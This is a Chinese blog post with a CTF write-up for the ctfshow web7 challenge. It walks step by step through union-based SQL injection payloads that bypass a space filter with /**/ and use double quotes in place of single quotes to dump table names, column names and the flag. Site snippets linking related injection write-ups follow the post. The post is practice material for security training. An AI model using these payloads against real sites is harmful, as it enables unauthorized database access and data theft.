CTF_ctfshow_web7_sql注入之过滤空格

最新推荐文章于 2024-05-02 23:45:30 发布
最新推荐文章于 2024-05-02 23:45:30 发布
阅读量480 收藏
点赞数
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54227009/article/details/124765464
版权

打开靶机

 

 

打开每一个列表,发现有一个id,所以为get传参

ok,找一下注入点

-2/**/union/**/select/**/1,2,3#

这里发现过滤了空格,所以直接用/**/代替空格进行绕过,发现回显点为2,3

下面开始查库吧!

-2/**/union/**/select/**/1,database(),version();#

库名:web7

版本: 10.3.18-MariaDB

查表:

-2/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema=database()#

三张表: flag,page,user

这里我们看一下flag的字段名:

 

-2/**/union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.column/**/where/**/table_schema=database()/**/and/**/table_name="%27flag%27"#

并无结果,发现单引号被转化成了%27,所以这里过滤了单引号,但双引号发现并未被过滤,所以用双引号进行绕过

id=-2/**/union/**/select/**/1,(select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name="flag"),3#

 字段名:flag

直接查flag:

-2/**/union/**/select/**/1,(select/**/group_concat(flag)/**/from/**/flag),3#

ctfshow{794e88a5-50c0-4a73-847c-9f2f596c3980}

over!! 

鸡肋是鸡肋!
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF:[NCTF2019]SQLi --sql正则注入 ---- regexp注入 --- sql 闭合的新的骚操作 --PHP版本的%00截断
Zero_Adam的博客
03-15 971
目录:一、自己做,二、学到的:三、学习WP:1.盲注, 这个讲正则注入原理比较细致,有mysql的本地实验 这个有一道例题 一、自己做, fuzzing了,但是没有思路, 给我这么一句话:try to make the sqlquery have its own results. 后来发现没用, 二、学到的: mysql正则注入 regex 一个新的sql闭合方式,妈呀,骚的很,至少对于我这个菜鸡才说是开了眼界了,,,牛你牛后面看看 sql注入时,当注释符和单引号都被过滤了的时候,我们不能够闭合语句了,
轩禹CTF_RSA工具3.6.1.zip
01-29
CTF常用工具集
宽字节注入
weixin_44300286的博客
10-06 249
0x01前言 之前学基本注入的时候,就没有考虑过单引号或双引号义的情况,今天就来补充一下这方面的知识。 在学习宽字节注入前,我们先了解一个函数addslashes: string addslashes ( string $str ) 返回字符串,该字符串为了数据库查询语句等的需要在某些字符前加上了反斜线。 这些字符是单引号(')、双引号(")、反斜线(\)与 NUL(NULL 字符)。 在...
ctfshow-WEB-web7
热门推荐
wangyuxiang946的博客
08-22 1万+
ctf.show WEB模块第7关是一个SQL注入漏洞,注入点是数值型注入,源码中过滤空格,我们可以使用括号()或者注释/**/来代替空格 页面中有一个文章列表,随便点一个 从url地址栏中可以看到,页面通过文章的id值来查询文章内容,我们可以考虑SQL注入漏洞 首先判断注入点,输入以下payload,使SQL恒成立 1/**/and/**/1 可以看到,页面正常显示 在输入以下payload,使SQL恒不成立 1/**/and/**/0 可以...
2024年最全ctfshow-WEB-web7_ctfshow web7
最新发布
2401_84300255的博客
05-02 287
从url地址栏中可以看到,页面通过文章的id值来查询文章内容,我们可以考虑SQL注入漏洞首先判断注入点,输入以下payload,使SQL恒成立可以看到,页面正常显示在输入以下payload,使SQL恒不成立可以看到,页面空显示由此可以判断页面存在SQL注入,注入点为,页面中有显示位,可以尝试进行脱库先来判断显示位,此处id传一个-1,由于id通常不为负数,后端根据id查询不到内容,就只能展示联合查询的结果,从而帮助我们判断字段显示的位置。
sql注入_1-7_绕过注入
weixin_44110913的博客
12-09 657
文章目录一.sql注入绕过概念二.sql注入绕过手段三.sql绕过演示四.总结 一.sql注入绕过概念 1.为什么要绕过? 因为有时候存在注入,但是很多符号被过滤掉, 所以我们不的不使用绕过手段。 2.绕过就是虽然我们注入时使用的字符串或者符号被过滤,但我们依然可以使他报错,并且报出他的数据库表名等 二.sql注入绕过手段 1.注释符 通常是用来注释掉id=1’ 这个单引号,或者字符串 2....
SQL注入引号类型+空格过滤
Auroraxsn的博客
04-24 1979
初始页面: 1.判断注入类型 ?name=root' 页面返回异常,既没有表格内容也没有表格的列名 ?name=root" 页面返回正常,没有表格内容但有表格列名,判断为单引号类型 ?name=root'--+ 页面报错,显示“ERROR NO SPACE”,猜测可能有空格过滤 ?name=root'%23 ?name=root'/**/' ?name=root'and(1=1)%23 页面返回正常,即有表格内容又有表格列名,判断为空格过滤 ...
CTF.rar_ctf_seed7rj
09-21
【标题】"CTF.rar_ctf_seed7rj" 暗示了这是一个与网络安全相关的挑战,CTF(Capture The Flag)是网络安全领域常见的比赛形式,通常涉及逆向工程、密码学、网络攻防等技能。"seed7rj"可能是这次挑战的一个特定标识...
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
隐写_Jphswin_ctfshow.rar
08-26
这个压缩包文件“隐写_Jphswin_ctfshow.rar”显然包含了这个工具的可执行文件,很可能用于参加类似于CTF(Capture The Flag)的信息安全竞赛或挑战。 Jphswin是一个基于JPEG图片的隐写工具,它利用JPEG文件格式的...
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
sql注入时带引号屏蔽的怎么处理
Huamang的博客
02-09 5160
写了学长给的一个题目,第一关就是一个sql注入,但是尝试了万能密码是不管用的,因为题目把单引号过滤掉了,无法使用单引号来闭合 $sql = "SELECT username, password FROM user WHERE username='" .$user ."' && password='" .$pass ."'"; 要想闭合sql语句加上or 1=1#来使判断条件为真,我学到了一个操作:使用\义 用\义后面的单引号 在用户名框输入\,密码框输入or 1=1 #,这样提交后,
CTF show----web 解题笔记(web7~web10)
weixin_45908624的博客
01-05 603
ctfshow web7-web10
CTF-show WEB入门--web7
m0_73912575的博客
12-30 568
CTF-show WEB入门--web7
ctfshow web入门——web7
m0_74093152的博客
01-29 334
ctfshowweb入门——web7
CTFshow-web-web7
qq_68581192的博客
10-11 129
尝试联合注入,先来判断显示位,此处id传一个-1,由于id通常不为负数,后端根据id查询不到内容,就只能展示联合查询的结果,从而帮助我们判断字段显示的位置,输入。发现只有一个flag字段,查询flag表中的flag字段,输入。点击第一篇,发现url中有id=1,可能存在sql注入漏洞。当前使用的数据库是web7,再查询当前数据库的所有表,输入。发现一个flag表,再查询flag表中的所有字段,输入。尝试输入id=1 and 1=1#,发现有错误。回显位置为2,查询当前使用的数据库,输入。
ctfshow web7
m0_63253040的博客
04-03 336
首先进入环境 随便点一篇文章 在url上可以看见?id=1存在注入,测试发现存在空格过滤,用/**/绕过,然后这里是整数型注入 如何判断是字符型注入还是整形注入 然后就是正常的爆数据库一步一步来 ...
sql注入空格过滤_CTF小白入门- SQL注入位置发现及绕过
weixin_39945475的博客
11-16 2729
上一篇中介绍了 SQL 注入的各种方式和利用情况。这一篇中介绍注入位置及注入点的发现方法。对内容有不理解的小伙伴或发现错误的小伙伴,可以私信和我联系,共同探讨。如果您喜欢,麻烦点个赞,(づ ̄ 3 ̄)づ常见注入点位置及判断方法在CTF比赛中,注入点一般存在一下几个地方。GET中的注入点 一般这种注入点最容易被发现了,可以用sqlmap或者 手工验证。POS中的注入点 POST参数中的注入点一...
一天一道CTF 第七天(SQL注入 空格绕过)
scrawman的博客
03-06 646
[极客大挑战 2019]LoveSQL 同样的背景,同样的SQL注入。尝试用admin' or '1'='1和password' or '1'='1登录一下。有回显,但是这一长串应该不是flag。 那就是有回显的sqlmap注入了,但是直接在登录框里注入好像是不行的,得用hackbar在URL里注入。 先查字段数,payload为http://0908d19b-01e5-4170-a57a-70a6ac79022f.node3.buuoj.cn/check.php?username=1'order by
ctf_awd_platform
10-23
CTF(Capture The Flag)即夺旗赛,是一种网络安全竞赛形式。AWD(Attack-Defense)平台是一种特殊的CTF比赛平台,主要专注于攻击和防御的技能训练与比拼。 ctf_awd_platform是指一种特定的AWD平台,其目的是为了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值